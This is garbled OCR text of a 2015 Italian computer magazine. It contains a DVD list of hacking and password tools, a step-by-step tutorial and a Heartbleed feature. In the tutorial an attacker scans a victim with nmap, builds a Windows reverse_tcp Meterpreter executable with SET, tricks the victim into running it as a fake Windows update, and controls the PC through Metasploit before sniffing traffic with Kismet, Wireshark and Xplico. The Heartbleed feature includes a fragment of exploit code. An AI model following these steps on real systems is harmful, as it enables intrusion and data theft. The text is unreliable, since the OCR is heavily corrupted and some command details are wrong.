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TP-LINK 

The Reliable Choice 


■ 

1900 

Mt>p s L’ADSL2+ Modem Router 

I più veloce al mondo! 


ÈH1900 AC1900 Modem Router Gigabit 
ADSL2+ Wireless Dual Band Archer D9 


5GHz 1300Mbps + 2.4GHz 600Mbps 

Tecnologia Beamforming 
Aumenta la copertura wireless 


m 


1 USB 3.0 ultraveloce e 1 USB 2.0 

per convidere file, stampanti e multimedia 

Processore dual core ad 1GHz « ^ 

CPU ad alte prestazioni e 
schermatura/prestazioni ad alto carico 


Un'ampia scelta di prodotti ADSL 





CH1750 Modem Router Gigabit 
ADSL2+ Wireless Dual Band AC1750 
Archer D7 

((<“>jt| 5GHz 1300Mbps+ 2.4GHz 450Mbps 
2 porte USB per la condivisione 
Connessioni Gigabit Ethernet 


0^1200 Modem Router Gigabit 
ADSL2+Wireless Dual Band AC1200 

Archer D5 

((<« 0 5GHz 867Mbps+ 2.4GHz 300Mbps 
2 porte USB per la condivisione 
|B| Connessioni Gigabit Ethernet 


CS750 Wireless Dual Band 
Gigabit ADSL2+ Modem Router 
AC750 - Archer D2 

5GHz 433Mbps+ 2.4GHz 300Mbps 
2 porte USB per la condivlsione 
|0 I Connessioni Gigabit Ethernet 




Il software sul DVD-Rom 



INCLUDE 

DVD da 4,3 GB 


Kali Linux 10.9 

Scopri le tecniche proibite per 
accedere ai PC altrui 

Tipo: Freeware 
File: kalMinux-109a-i38G.iso 


abylon BASIC il i ■ 

Metti in cassaforte file e dati 
sensibili 

Tpo: Commerciale completo 
File: Basócll jip 


Hiren's BootCD 152 

Risolvi i problemi all'avvio di 
Windows 

Dimensione: 5,10 MB 
Tpo: Freeware 
File: www.edmaster.it/urt/3t28 



mIRC 7 32 S 1 

Quando la chat si trasforma in 
file sharing 

Tpo: shareware 
Rle:mirc7324> 

iSpy (.22 K I 

Crea e gestisci un sistema di 
videosotveglianza 

Tpo: Freeware 
FfeiSpy_6_2_2_lldp 


CryptoSMS i 1 

Invia e ricevi SMS criptati 

Tpo; Freeware 
F9e: CryptoSMS^ip 



nVD43Gft 


Hacker 
Suite 2015 


L'esclusivo kit 
software per superare 
qualsiasi protezione 


orano ni avvio 




G Data Internet 
Security Suite 2015 U I 

La suite di sicurezza che blin¬ 
da il PC 

Tpo: Completo 
RleiTA_R_TRL_AutoTrial_2015zip 




mp3Stego 18 

All'intemo dei tuoi Mp3 c'è 
tanto altro 

Tipo: Freeware 
Rie: MP3Stago J_1 J&àp 


ImgBurn 257.0 

Scriviamo ISO maggiori di 4 GB 


Tipo: Freeware 
He: ImgBumzp 

.•*«4 

»*•* 



*1 

■*#» 

— 

— 



Music Rescue t a 

Recupera la musica da iTunes 

Tpo: Freeware 
Rie: musàcrescuezip 


lunkware Removai 
Tool 611 

Piazza pulita delle toolbar in¬ 
desiderate 

tipo: Freeware 
Fle JRTip 



dSploit • 

L'app android per scardinare 
qualsiasi rete 

Tipo: Freeware 
Rie: dSpinit-1 ÌL31 bzip 



WPA Tester Android E ■ 

Scova i bug nel tuo router Wifì 

Tipo: Freeware 
Rle:wpatesterzip 



AircrackGUI O 

Il passepartout per le connes¬ 
sioni WiFi! 

Tipo: Freeware 
File: aircrackap 



RAR PAssword 
Finder I 

Le password degli archivi in 
chiaro 

Tpo: Freeware 
Rle:rarpassworttzip 

|ohn thè Ripper 179 O 

"Il piede di porco" diventa di¬ 
gitale 

Tpo: Freeware 
Fie:john179w2zip 



FaceNiff 2.4 

I dati sensibili di Facebook in 
un tocco 

Tpo: Freeware 
Ffe: FaceNiff-2.4ip 



Wireshark .107 

Analizza e filtra il contenuto di 
tutti i pacchetti di rete 

Tpo:Reeware 

Rlc:Wireshark-winzip 



Firesheep&J 

Sniffa tutto dal browser 

Tpo: Freeware 
Rie: fìresheepzip 



ISO/God Li ■ 

Le ISO su XBOX 

Tpo: Freeware 
File: Bo2godzrp 
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il software sul DVD-Rom 



WBF5 Manager ;.o i 1 

Tutti i giochi che vuoi, su Wii 

Tipo: Freeware 
file: wbfsjp 



Calibre 134 « piugin E 1 

Legge, converte e gestisce gli 
e-book 

Tpo; Freeware 
Rie: cato-1.34.04) 



Cain&Abel42 

Un pronto recupero per le 
password perdute 

Tpo: Freeware 
Rie: ca_$etup4> 


Camouflage 

Nascondere i file aH'intemo di 
una foto )PG 

Tpo: Freeware 
Fìe:Camou1214> 



Hide in Pkture 

Nascondere file nelle immagi¬ 
ni GifeBmp 

Tpo: Freeware 
Rle:hip21_en4> 



wbStego « 

La steganografia per nascon¬ 
dere file e dati 

Tpo: Freeware 
fife: wbs42i4> 



File in File Dannyfox 

Nascondi le immagini in altre 
immagini 0 nei file Mp3 

Tpo: Freeware 
He: Rie in file4> 


Adwdeaner «122 

: Via le fastidiose toolbar dai 
browser Web 

Tpo: Freeware 
Rle:AdwCleaner4) 



^Adwcleoner 


♦ - i — - - 

.— t — é*—. *«— a 


Our Secret 

I tuoi dati personali in una foto 

Tpo: Freeware 
Rle: 0 u[Secret 2 p 

ZIP'n'JPG lo 

Gli archivi Zip spariscono nelle 
foto 

Tpo: Freeware 
Rle:Z1P_n_JPG4> 


avast! Browser 
Cleanup l I 

: Così il browser è pulito 

Tpo: Freeware 
Fle: avast-tmrwser-cleanupiip 


- - 




DeEgger Embedder uj 

Protezione dei file aH'intemo 
di file multimediali 

Tpo: Freeware 
Rle:DeEggerSetup1314) 



Spybot - Search & 

Destroy ?3l I 

: Pulizia completa da spyware 
e malware per il PC 

Tpo: Freeware 

Ffe:spybot-2.34) 



Toolbar CJeaner 13 SI 

: Via le toolbar in pochi secondi 

Tpo: Freeware 
file: tnolbardeaner_setup4) 



Sicurpas Freeware 40 E I 

Professional 

Il tool di sicurezza file e dati 
Made in haly 

Tpo: Freeware 
File: SicurpasFreeware.rar 


PC Decraprfier 229 

Programmi inutili addio! Ecco 
come rimuoverli al volo 

Tpo: Freeware 
Fìe: pc-decrepifier-211 41 



Smart Toolbar 
Remover 22 

Stop alle toolbar inutili e pericolose 

Tpo: Freeware 
Rle:toofareinoveup 


Revo Uninstaller 195 

Uninstaller radicale che non 
lascia traccia dei software 

Tpo: Freeware 
Rie: revosetup4> 


Urtchecky 0210 S I 

Mai più programmi indeside¬ 
rati sul PC 

Tpo: Freeware 
Rie: unchecky.setupiip 



COeaner4j2.4657ffl 
Ripulisci a fondo il PC da file 
inutili e obsoleti 

Tpo: Freeware 
Rle:ccsetup4124) 



Appnimi RAR Password 
Unlocker 202 

Scova con un clic le password 
dei file Rar 

Tpo: Freeware 
Fìe: RARPasswordUnlocte.zip 




Appnimi PDF Unlocker 20 

Recupera le password dei do¬ 
cumenti PDF 

Tpo: Freeware 
Rie: pdfpasswerrirecowry4> 



NTPassword 

Avviare direttamente il PC da 
CD-ROM 

Tpo: Freeware 
file: odi 402014) 




Appnimi Word Password 
Recovery 25 

Aprire e recuperare documenti 
Word protetti 

Tpo: Freeware 
Rie: WoròPasswordRecoveiy4> 

Ufo Wardriving 
Invasion > I 

Recupera le chiavi di Rete di 
tantissimi router Wifi 


ProduKey tw 

Recupera il codice seriale del 
tuo sistema operativo! 

Tpo: Freeware 
file: pradukeyip 



Tpo: Freeware 
Rle:setup_iifo44) 



RunAsDate W 121 


WebBrowserPassView 1 so 

Recuperare le password usate 
nei browser Web 


Prolunga la data di scadenza 
dei programmi trial 

Tpo: Freeware 
file: runasdate.ZIP 


Tpo: Freeware 
Rie: webbrowseipassviewTlP 




OllyDbg uo 

Il debugger che crea patch per 
programmi 

Tpo: Freeware 
Flle:odbg1104> 
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Faldate | Hacker il disco segreto | 


A scuola di hacker 



Hacker 
segreto 

Abbiamo “smanettato” con il kit 
che buca la rete e attiva un canale 
autorizzato sul PC del malcapitato 


rs 


Cosa ci 
occorre 


TOOL DI HACKING 

HACKER 
SUITE 2015 

✓DVD 

t&MUsmmwì 

Note: 

Per avviare la versione 
Live delia distribuzione 
è sufficiente inserire 
il DVD nel lettore e 
impostare l’avvio da 
DVD dal BIOS della 
scheda madre 


I l rischio più probabile a cui andiamo in¬ 
contro ogni volta che usiamo un PC è che 
i nostri dati vaghino in giro per la Rete, 
finendo nelle mani sbagliate. A quel punto, 
chiunque abbia un minimo di conoscenze 
tecniche e sia a conoscenza del nostro indi¬ 
rizzo IP, riuscirà ad analizzare l’intero traffico 
di rete, inclusi i siti Web che raggiungiamo 
o le password che digitiamo. Per farlo, può 
intraprendere differenti strade ma senza 
ombra di dubbio la più conosciuta, rapida e 
funzionale è quella di sfruttare le vulnerabi¬ 
lità del sistema operativo che utilizziamo. 

Sistemi operativi a rischio 

Inutile precisare che il pirata preferisce avere 
a che fare con gli utenti Windows che, fra gli 
OS più conosciuti, è di sicuro quello più a 
rischio e sul quale è più semplice installare 
una backdoor per farsi poi spazio nell’hard 
disk. Ma non dobbiamo dimenticare che Mac 
OS X o lo stesso Linux non sono esenti da tale 
problematica: ogni sistema operativo ha, 
infatti, il suo tallone d’Achille e l’unica arma 
che abbiamo a disposizione per difenderci è 
quella di conoscere tutte le vulnerabilità del 
sistema che utilizziamo. E poi c’è Facebook, 
il luogo preferito non solo da milioni di utenti 
sparsi per il mondo ma anche dai pirati asse¬ 
tati di dati altrui. Riuscire a creare un clone 
perfetto dell’home page del social network in 
blu è veramente un gioco da ragazzi e ai pirati 
basta poco per dirottarci su queste pagine 
fasulle dove, ignari del pericolo incombente, 
andremo ad effettuare il login usando user- 
name e password del nostro account! Come 
difendersi? Imparando ad usare le stesse armi 
d’attacco dei pirati! Immergiamoci, dunque, 
in questa nuova avventura, analizzando ogni 
singolo caso e ogni possibile minaccia: solo 
così riusciremo a creare un’invalicabile linea 
di difesa. 





Hacker il disco segreto | Fai da te 


A scuola di hacker 


□ Grimaldello da taschino 


Lo strumento preferito dai pirati per intrufolarsi nei PC altrui è la distribuzione BackTrack Linux, battezzata da noi col 
nome di Hacker Suite 2015. Essa include numerosi tool adatti allo scopo, può essere installata anche su chiavetta 



Tutto su un DVD 

Hacker Suite 2015 lo trovi ne\\'Inter¬ 
faccia principale del Win DVD-Rom. Il 
tool è pronto per essere utilizzato in modalità 
live: per essere utilizzato e sufficiente inseri¬ 
re il supporto nel lettore; non serve effettua¬ 
re alcuna installazione sul proprio computer. 



^ Usiamola da chiavetta 

Colleghiamo una pendrive con almeno 4 GB 
di spazio libero ad un ingresso USB disponi¬ 
bile sul computer e cucchiamo sul pulsante Instali 
BackTrack 5 RI presente sulla Scrivania. Selezio¬ 
niamo quindi la lingua Italiano e awiamo la proce¬ 
dura guidata con un clic sul pulsante Avanti. 


^ Dentro al BIOS 

Accediamo al BIOS della nostra scheda 
madre premendo Cane e impostiamo il 
boot da periferica DVD. L'operazione varia in base 
al tipo di scheda madre installata nel computer. 
Inseriamo quindi nel lettore il disco di BackTrack e 
riavviamo nuovamente il PC. 



^ Partizioni da smontare 

Proseguiamo fino a raggiungere la sche¬ 
da Disposizione della tastiera. Scegliamo 
l’opzione Italia e rispondiamo cuccando su S/alla 
domanda Smontare le partizioni in uso. Così facen¬ 
do potremo installare BackTrack 5 RI anche sulla 
pendrive USB collegata precedentemente al PC. 


Avviamo la distro 

Verrà caricata la distribuzione. Nella scher¬ 
mata di boot che appare selezioniamo Bac¬ 
kTrack Text e confermiamo con Invio. Digitiamo 
il comando startx, premiamo Invio e attendiamo 
il caricamento dell’interfaccia grafica. La distro è 
pronta per essere usata in modalità Uve DVD. 




matta I 



^ La pendrive è pronta! 

Clicchiamo su Avanti fino a raggiungere la 
scheda Preparazione spazio su disco. Sce¬ 
gliamo l’opzione Cancella e usa l'intero disco tra 
quelle proposte. Dal menu a tendina selezioniamo 
la periferica USB (indicata con sdb) e confermiamo 
premendo ancora una volta il pulsante Avanti. 




^ Rendiamola avviabile 

£.i, Prima di procedere aH'installazione definitiva della distro, clicchiamo 
sul pulsante Avanzato. Abilitiamo l’opzione Installare il bootloadere 
selezioniamo dal menu a tendina la pendrive USB (nel nostro caso, clicchia¬ 
mo /dev/sdb ). Confermiamo con un clic sul pulsante OK. 


-x Installazione in corso 

Non rimane che cliccare sul pulsante Installa e attendere che l'instal¬ 
lazione venga correttamente portata a buon fine. Completata la pro¬ 
cedura guidata, potremo riavviare il computer ed effettuare il boot dalla peri¬ 
ferica USB, impostando la voce corretta nel BIOS (Passo 2). ► 
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13 Accesso non autorizzato 

Grazie al programma Nmap, il pirata rileva l’indirizzo IP e il sistema operativo della vittima. In questo modo potrà 
identificare facilmente i punti deboli del computer attaccato per usarli a proprio vantaggio. 



Scansione in corso 

Ottenuto l’accesso alla LAN cui è collega¬ 
ta la vittima, il pirata avvia il Terminale e 
digita il comando nmap -sP - PT80 seguito dal 
range di indirizzi IP da scansionare (nel caso in 
esempio, da 192.168.114.1 a 192.168.114.10, 
Conferma con Invio e attende il risultato. 



^ Porte aperte sul PC 

Osservando l'output ottenuto, decide di 
analizzare ogni singolo IP rilevato. Digita 
il comando nmap -sS seguito dall'indirizzo della 
vittima (nell'esempio, 192.168.114.1) e attende 
che l'elenco delle eventuali porte aperte sul PC 
della vittima venga mostrato su schermo. 
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^ OS rilevato! 

Il pirata continua la sua fase di analisi cer¬ 
cando di scoprire quale tipo di sistema 
operativo è utilizzato sul computer della vittima. 
Digita quindi il comando nmap -0 seguito dall'in¬ 
dirizzo IP (nel caso in esempio, 192.168.114.1) e 
attende che venga visualizzato il verdetto. 


S Rete bucata in tre mosse 


Le falle di sicurezza degli OS più diffusi consentono al pirata di intrufolarsi agevolmente nel nostro PC. Per farlo, 
deve prima creare un “payload”, cioè un programma per l’accesso da remoto. Ecco in che modo. 



Tutto da linea di comando 

Avviata una nuova sessione del Terminale, 
il pirata accede con cd alla directory pen- 
test/exploits/sete impartisce il comando ./set per 
avviare il software Set. Sceglie l’opzione 4 per cre¬ 
are un payload e un listener (una lista di operazioni 
da eseguire) da iniettare nel PC della vittima. 


^ Obiettivo: Windows 

Supponendo che il pirata voglia colpire un 
PC con sistema operativo Windows (quello 
rilevato in precedenza da Nmap), il pirata digita 2 
e conferma con Invio per scegliere l'opzione Win¬ 
dows Reverse_ TCP Meterpreter (mediante il qua¬ 
le controllerà il PC vittima da Terminale). 


Una porta d’ingresso 

A questo punto, il pirata crea un file esegui¬ 
bile capace di sfruttare una backdoor attiva 
sul PC bersaglio. Digita quindi 16 e conferma con 
Invio. Indica una porta di ascolto (nel nostro caso 
abbiamo scelto la 4444) e preme nuovamente 
Invio. Attende dunque che l’.exe venga generato. 
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□ Controllare Windows 

Creata la backdoor, il pirata sfrutta alcune tecniche di ingegnerìa sociale per installarla sul PC 
della vittima. Per riuscire a prendere il controllo del sistema da remoto, usa il tool Metasploil 
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^ Il file fondamentale 

Usando il file manager di BackTrack, il pirata raggiunge 
la directory set in pentest/exploits con il comando cd. 
Copia quindi il file msf.exe creato in precedenza (Passo C3) e, 
tramite pratiche di social engineering, lo trasferisce sul PC della 
vittima, avviandolo. 



^ Metasploit in azione 

A questo punto, il pirata avvia una sessione del Termina¬ 
le e con il comando cd raggiunge il percorso /opt/frame 
work/msf3. Digita il comando ,/msfconsole per avviare il sof¬ 
tware Metasploit, che utilizzerà per controllare anche da remoto 
il sistema della sua vittima. 




^ Ecco la porta d'accesso 

Il pirata lancia prima il comando use exploit/multi/han- 
dlere poi set payload windows/meterpreter/reverse_ 
tcp. Indica l'indirizzo IP della vittima con set lhost(ne\ caso in 
esempio, 192.168.114.1) e la porta configurata in precedenza 
(Passo C3) con set Iport 4444. 



* Nel PC della vittima! 

g II pirata ha ora a disposizione una serie di comandi che 
può usare per controllare da remoto la copia di Windows 
7 installata nel PC del malcapitato. Per scoprirli, digita help. Per 
catturare ad esempio una schermata del desktop, gli basta sem¬ 
plicemente lanciare il comando screenshot. 


^ Traguardo raggiunte! 

4 I II pirata dà il comando exploit e attende che la vittima 
awii il file msf.exe, magari facendole credere che si tratti 
di un update di Windows. Non appena il pesce avrà abbocca¬ 
to, Metasploit restituirà un messaggio di conferma e avvierà il 
meterpreter creato dal pirata! 


^ Pieno controllo 

0 Può inoltre avviare e gestire il Prompt dei comandi di 
Windows digitando semplicemente il comando execute 
-femd seguito da Invio o addirittura spegnere il PC della vittima 
lanciando il comando shutdown. E non c'è antivirus o firewall 
che tenga: anche Windows 7 è stato bucato! 




ENGINEERING 

L'ingegnerìa sociale è 
un insieme di tecniche 
adottate dai pirati 
informatici (e, più in 
generale, dai truffatori) 
per venire a conoscenza 
delle informazioni 
personali delle loro 
vittime. 

EXPLOIT 

Con questo termine 
si identifica un codice 
che, sfruttando un bug 
o una vulnerabilità 
del sistema operativo 
attaccato, porta all'ac¬ 
quisizione di privilegi di 
amministratore. 

BACKDOOR 

Si tratta di una porta di 
comunicazione aperta 
sul sistema vittima che 
permette di bypassare 
le eventuali protezioni 
attive. 

PAYLOAD 

Letteralmente, carico 
utile. Indica quella 
parte di codice di un 
malware che svolge il 
"lavoro sporco", cioè 
le operazioni che 
permettono al virus 
di infettare il sistema 
dell'utente. 


► 
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Password e codici di accesso 


Dopo aver ottenuto l’accesso al sistema attaccato, il pirata riesce a catturare tutti i dati in transito sulla nostra 
rete senza fili, per poi analizzarli vedendo in chiaro password e non solo! 



^ Una spia in rete 

j In BackTrack il pirata avvia una nuova 
sessione del Terminale e digita il coman¬ 
do kismet pei avviare il tool di snifflng (analisi del 
traffico) di rete. Alla domanda StartKismet Server 
risponde Yes e attende qualche secondo affinché 
Il software si configuri automaticamente. 



^ Wireless sotto controllo 

Quando viene richiesta l’aggiunta di un'in¬ 
terfaccia di rete, il pirata conferma con 
Yes e compila il campo Intf con il nome assegna¬ 
to alla scheda senza fili (ad esempio, wlanO) e 
conferma con Add. Per conoscere le interfacce di 
rete digita da Terminale il comando iwconfig. 



^ Sniffino in corso 

3 Kismet è pronto e operativo. Tutti i pac¬ 
chetti trasmessi ini rete e catturati vengo¬ 
no visualizzati nell’interfaccia grafica principale 
del software. Quando il pirata avrà raggiunto la 
quantità di dati desiderata, può fermare la cattura 
con Disconnect presente nel menu Kismet. 


B In ascolto sulla LAN 


Il nemico potrebbe anche nascondersi aN’intemo della nostra rete locale interna e, utilizzando Wireshark, riuscire 
a sniffare i pacchetti che viaggiano via cavo. Ecco la tecnica utilizzata. 
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^ Il tool giusto 

■j II pirata raggiunge la voce Wireshark dal 
menu Applications/BackTrack/informa- 
tion Gathering/NetworkAnalysis/Network Traf- 
ficAnalysis. Avvia quindi il software verificando di 
essere in possesso dei privilegi di amministratore e 
clicca su List thè available capute interfaces. 
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▲ Ecco i pacchetti! 

Sceglie fra ethO o wlanO e avvia il processo 
cuccando Start. Lo sniffing ha inizio: tutti i 
pacchetti in transito vengono visualizzati nell'in¬ 
terfaccia principale di Wireshark. Quando il pirata 
avrà raggiunto il suo obiettivo, ferma il processo 
cliccando Stop thè running live capture. 


^ È tutto memorizzato 

A questo punto il pirata si sposta nel menu 
File e seleziona l’opzione Save per salva¬ 
re una copia di tutti i pacchetti catturati. Indica un 
nome ed una directory di destinazione e termina 
con un clic sul pulsante Save. Può quindi chiude¬ 
re Wireshark. 
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0 Inizia l’analisi dei dati @310 


Dopo aver sniffato il traffico di rete, per il pirata è giunto il momento di “tradurre” tutti i pacchetti 
criptati. Ecco come e cosa fa per leggere in chiaro e-mail, messaggi di Chat e cronologia Web. 



^ L’interprete dei dati 

■| Per rendere leggibili i dati sniffati dalla rete, il pirata usa 
Il tool Xplico. Per avviare la comoda Interfaccia Web di 
gestione, raggiunge la voce xplico web gui presente nel menu 
Applications/ BackTrack/Information Gathering/Network 
Analysis/Network Traffic Analysis. 



log- 


-x Xplico è operativo 

A questo punto, il pirata apre una nuova scheda del Ter¬ 
minale e avvia Xplico lanciando II comando /etc/init.d/ 
xplico start seguito da Invio. Attende qualche secondo affinché 
il servizio venga correttamente eseguito e avvia il browser senza 
chiudere la finestra del Terminale. 



^ Accesso in corso 

3 II pirata digita http://localhost:9876 nella barra indiriz¬ 
zi di Firefox (preinstallato in BackTrack). Nell'interfaccia 
Web di Xplico decide di autenticarsi usando xplico come User- 
name e xplico come Password. Non gli rimane altro da fare che 
confermare con un clic su Login. 


^ Un caso da analizzare 

4 Appare quindi il menu principale dell'Interfaccia Web di 
Xplico. Il pirata clicca sul pulsante New Case e, nella 
sezione Data Acquisition, sceglie l’opzione Uploading PCAP 
capute file/s. Assegna un nome al caso da analizzare e confer¬ 
ma la sua creazione con un clic su Create. 


UNOSNIFFER 

ALTERNATIVO 


Finora abbiamo visto 
come il pirata utilizza 
strumenti del calibro di 
Kismet o Wireshark per 
sniffare tutto il traffico 
in transito su una rete. 
Tali software, grazie al¬ 
la presenza di un'inter¬ 
faccia grafica risultano 
alquanto semplici ed 
intuitivi. Ma, come al 
solito esiste qualcosa 
di alternativo che 
funziona direttamente 
da linea di comando. 
Stiamo parlando di 
Tcpdump, un ottimo 
sniffar anch'esso inte¬ 
grato in BackTrack S 
RI e comunque instal¬ 
labile su tutte le altre 
distribuzioni Linux. 
Nonostante sia privo di 
interfaccia grafica, il 
suo utilizzo è veramen¬ 
te semplice: al pirata 
basta infatti lanciare 
da Terminal* il coman¬ 
do tcpdump per avviare 

10 sniffar che catturerà 
dunque tutto ciò che è 
in transito sulllnterfac- 
ciaethO. Per affinare la 
sua opera, utilizzando 
magari l'interfaccia Wi- 
H, il pirata scopre una 
completa lista delle 
opzioni disponibili con 

11 comando tcpdump 
-help. 



^ lina nuova sessione 

g II pirata seleziona il caso appena creato e clicca sul pul¬ 
sante NewSession presente nel menu a lato dell’Inter¬ 
faccia Web di Xplico. Fornisce un nome al processo (ad esem¬ 
pio, decodifica) e conferma con un clic su Create. Fatto questo, 
accede alla sessione appena creata. 


^ I dati sono in chiaro! 

0 II pirata si sposta in Pcap sete preme Browse per cari¬ 
care l’output restituito da Wireshark o Kismet. Conferma 
con Uploade attende che i pacchetti vengano decodificati. Ogni 
tipologia di dato acquisito viene inserito nella relativa categoria 
[Mail, Web, Chat, VOIPecc.). 


► 
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Con la nostra guida impari ad usarei tool 
proibiti per entrare in ogni PC e apprendi 
le mosse per blindare Windows 


n 


A nche per colpa del clima di sensazio¬ 
nalismo che in questi ultimi decenni 
sembra aver posseduto gli organi di 
informazione, al manifestarsi del più pic¬ 
colo dei problemi è già allarme. Ciò accede 
soprattutto per le epidemie "reali”: influenza 
aviaria o simili ne sono l’esempio lampante. 
Ma poiché siamo ormai immersi nella tecno¬ 
logia (e spesso la nostra vita dipende proprio 
da essa), lo stesso allarmismo regna sovrano 
ogniqualvolta viene scoperto un nuovo virus 
o una vulnerabilità di natura informatica. 

Allarme Heartbleed 

Quando un bug mette fuori uso per qualche 
ora un server importante (ad esempio, quelli 


di Facebook) i media annunciano l’evento 
come un presagio dell'inizio dell'apocalisse. 
Il problema è che, proprio perché siamo 
ormai abituati a veder drammatizzare qual¬ 
siasi inezia, tendiamo a dare per scontato 
che “si esageri" e quindi a non prendere 
seriamente in considerazione neppure vul¬ 
nerabilità davvero pericolose. 

È il caso di Heartbleed, un bug particolar¬ 
mente grave legato al protocollo di comu¬ 
nicazione sicura OpenSSL (www.openssl. 
org). Nonostante si tratti, senza ombra di 
dubbio, della vulnerabilità più pericolosa 
degli ultimi anni, gli utenti hanno fatto 
fatica a comprendere l’entità e la gravità 
del problema. 


Così avviene un attacco ad un sito Web sfruttando il bug Heartbleed 


s = Socket.Socket(socket.AF INET,1 
socket.SOCKSTREAM) 
s.connect(("localhost" , "443")) 
s.send(create hello(version[i] 


while True: 


typ, ver, pay = 1 

recvmsg(s) 
if typ == None: 
return 

if typ == 22 and 1 

ord(pay[0]) == OxOE: 
break 


È TUTTO FIN TROPPO FACILE? 

Per sfruttare il bug Heartbleed è sufficiente usare uno script in 
Python. Ovviamente non esiste una versione pronta all'uso del 
codice, ma qualsiasi pirata potrebbe "iniettarlo" all'interno di un 
server e usarlo per prelevare 64 KB casuali dalla memoria RAM 
non allocata. 


UNA SOLA PORTA DA APRIRE 

Per prima cosa, il pirata si connette al server sulla porta 443, che 
è quella di un server HTTPS. Dopodiché attende una risposta 
dal server stesso per capire se è off-line o meno. Inutile dire che 
in caso il server fosse irraggiungibile il pirata non otterrebbe 
alcun risultato. 
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SVELATI TUTTI I DETTAGLI 
DELL'ATTACCO AL CUORE DEL WEB 

Il bug Heartbleed, letteralmente "cuore sanguinante", non è legato 
al protocollo SSL, e nemmeno all'implementazione di OpenSSL 
di per sé, ma all'estensione Heartbeat (letteralmente “battito del 
cuore"). Questa è stata scritta nel dicembre 2011 da Robin Seggel- 
mann, un dottorando dell'università di Duisburg-Essen, e approvata 
da Stephen Henson (uno dei gestori del progetto OpenSSL) senza che 
quest'ultimo si accorgesse del bug. 

Heartbeat si occupa di eseguire un test della connessione SSL per 
verificare, prima di cominciare la comunicazione vera e propria, che 
il server sia davvero chi sostiene di essere. 

Se, infatti, il server è davvero sé stesso, deve possedere la propria chia¬ 
ve privata, nota esclusivamente al server. In una normale richiesta effettua- 
mediante l'estensione Heartbeat, il Client invia al server la seguente richiesta (cifrando il testo 
con la chiave pubblica del server): Rispondi con la parola di 5 lettere “hello". 

A questo punto il server (se è davvero riuscito a leggere la parola "hello" decifrandola con la 
propria chiave privata) risponde: hello, dimostrando di possedere la chiave privata ed esse¬ 
re davvero chi dichiara di essere. Il bug sta nel fatto che il server non controlla che il numero 
di caratteri richiesto dal dient sia corretto. Un malintenzionato potrebbe quindi inviare al 
server la richiesta: Rispondi con la parola di 20000 lettere "hello", ottenendo la risposta 
helloXYZ dove, ovviamente, XYZ è un insieme di 19995 caratteri prelevati dalla memoria 
del server stesso. Un pirata può, quindi, ottenere un dump (un'operazione di estrazione di 
informazioni da un database) di quasi tutta la memoria RAM del server, per l'esattezza a 
blocchi di 64 KB la volta. E, ovviamente, nella memoria del server è caricato anche il certifi¬ 
cato di sicurezza, con tanto di chiave SSL privata. 



ta 


// 

A causa del bug Heartbleed, 
un malintenzionato può 
"estrarre" enormi quantità di 
dati dalla memoria di server 
vulnerabili compromettendo 
qualsiasi cosa, dalle chiavi 
private SSL alle password 
utente e tutto il resto 

Bruce Schneier, esperto di sicurezza 

e crittografo statunitense n 

Il pericolo che non ti aspetti 

Come ogni esperto di sicurezza sa, "un 
falso senso di sicurezza è più pericoloso 
di nessuna sicurezza". A causa di Heart¬ 
bleed, milioni di utenti in tutto il mondo 
sono stati vulnerabili proprio nei momen¬ 
ti in cui credevano di essere più protetti: 
mentre accedevano a pagine o servizi Web 
protetti mediante il protocollo HTTPS. Il 
bug consente ad un pirata la lettura delle 
informazioni inviate da un utente ad un 
server, comprese le password. 

I pirati che hanno scoperto il bug prima del 
suo annuncio pubblico possono, quindi, 
avere facilmente collezionato milioni e 
milioni di password di ignari utenti. 

Non si sa ancora se e quali account siano 
stati realmente violati sfruttando questa 
vulnerabilità. L’aggravante di tutta questa 
brutta storia è che tra i possibili attaccanti 
vi sono anche i servizi di informazione di 


alcuni governi nazionali che, neanche a 
dirlo, dispongono di sistemi di analisi del 
Web molto potenti. E la mente corre subito 
allo scandalo Datagate scoppiato dopo la 
scoperta delle migliaia di intercettazioni 


non autorizzate portate avanti per anni 
dalla NSA, l’agenzia di sicurezza nazionale 
degli Stati Uniti d’America. I servizi USA 
ovviamente negano tutto (www.winma- 
gazine.it/link/ 2606 ), ma secondo alcune 



IL CODICE DI ATTACCO È STATO INVIATO ECCO LA CHIAVE PRIVATA DEL SERVER 

Il pirata invia quindi la richiesta Heartbeat incriminata (generata dalla Per provare che il server sia davvero vulnerabile, basta verificare 
funzione create_hbper di OpenSSL). Bastano pochi bit di richiesta che abbia risposto ( pa y) con una parola di tre o più caratteri, 
per generare, o meglio sfruttare, un errore di programmazione Trovare la chiave privata del server non è un'operazione immediata 
che lascerebbe di stucco ogni programmatore, anche quello alle perché potrebbe essere nascosta nelle migliaia di caratteri leggibili 
prime armi. sfruttando Heartbleed. 
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WflHTED 

HEARTBLEED: C'È GIÀ 

UN PRIMO ARRESTO 

Si chiama Stephen Arthuro Solis-Reyes ed è il pri- 

SS=S 
•gSS5S5 


rispondere di uti 
lizzo non autoriz¬ 
zato di computer 
e furto di dati. Al 
momento la poli¬ 
zia canadese non 
ha ancora chiarito 
se l'hacker abbia 

agito da solo e co¬ 
sa abbia fatto dei 
dati rubati. 




fonti anonime bene informate Heartbleed 
è stato scoperto dalla NSA anni addietro, 
forse poco dopo la sua erronea introduzione 
nel codice di OpenSSL (leggi a tal propo¬ 
sito il box Svelati tutti i dettagli dell’at¬ 


tacco al cuore del Web), e gli 
agenti dell’intelligence non 
si sarebbero fatti scrupolo di 
usare il bug del protocollo per 
catturare e decifrare quante 
più comunicazioni possibili 
tra privati cittadini. 

Secondo Sean Gallagher di Ar- 
sTechina, inoltre, se davvero 
l’NSA avesse scoperto resisten¬ 
za di Heartbleed a pochi giorni 
dalla sua creazione, vorrebbe 
dire che l'agenzia di sicurezza 
americana avrebbe dedicato in¬ 
genti risorse per seguire e mo¬ 
nitorare il progetto e che, pur di 
raggiungere i suoi scopi, avrebbe 
evitato di segnalare il pericolo 
lasciando milioni di internauti 
in balìa dei pirati informatici. 
Un’ipotesi incredibile, che però 
confermerebbe quanto in parte 
già descritto dai documenti riser¬ 
vati del caso Datagate: dalle carte 
si evince, infatti, che l’intelligence 
americana dispone di un budget di 
1,6 miliardi di dollari da destinare 
all'analisi e allo sfruttamento dei 
dati che circolano su Internet e che gli 
esperti della NSA specializzati nella caccia 
alle vulnerabilità software sono im miglia¬ 
io, con il compito ben preciso di scovare 
ogni falla nei sistemi di crittografia! 


Un futuro incerto? 

Lo scenario catastrofico generato da Heart¬ 
bleed ha dunque riacceso nuove polemiche 
e argomenti di discussione relativi alla 
sicurezza su Internet. Ancora una volta 
sono coinvolti tutti, dalle grandi corpo¬ 
